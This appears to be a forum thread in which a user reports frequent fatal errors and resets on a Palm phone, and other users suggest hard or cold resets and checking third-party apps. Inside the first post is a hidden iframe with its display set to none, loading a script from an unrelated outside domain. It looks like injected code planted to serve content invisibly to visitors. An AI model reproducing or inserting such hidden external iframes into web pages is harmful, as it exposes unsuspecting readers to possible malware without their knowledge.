+ Reply to Thread

Fatal Errors & Reset

I am having frequent "Fatal Error" messages and then the unit goes into reset where you have to use the pointer to set up the screen again. This is in different programs, etc so I can't blame it on anything but the unit and it's ability to do MANy things at the same time. Anyone else have this problem....

Also.... I find that the unit will not keep my contract level setting..<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Not sure what you can do if it's happening in different places. You should pay attention to see if there are any patterns to the errors, e.g. are you using a certain hard key when it happens?

If it happens fairly often, you might also try a hard reset (and drain the backup batt) and use it without 3rd party apps/hacks, to see if it still gets errors.

Administrator
    kind of a generic post, seeing as we cant tell what programs you have installed and how long you have had these issues...

if you synced an old palm db to the phone it could have caused some issues, and also one or more apps you have on the phone could be the culprit.

one sure fire way is to cold boot the phone as previously mentioned and see if you still have the resets...